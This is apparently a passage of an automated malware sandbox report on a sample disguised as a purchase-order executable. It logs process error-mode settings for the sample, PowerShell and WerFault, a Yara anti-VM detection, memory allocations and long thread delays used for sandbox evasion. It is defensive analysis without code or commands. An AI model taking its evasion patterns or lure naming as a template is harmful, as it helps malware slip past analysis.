Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: 17D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: 33A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: 17D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: 93B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: A3B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: A5B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: B5B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: 2950000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Memory allocated: 4950000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599868	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598997	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe	Thread delayed: delay time: 597796	Jump to behavior
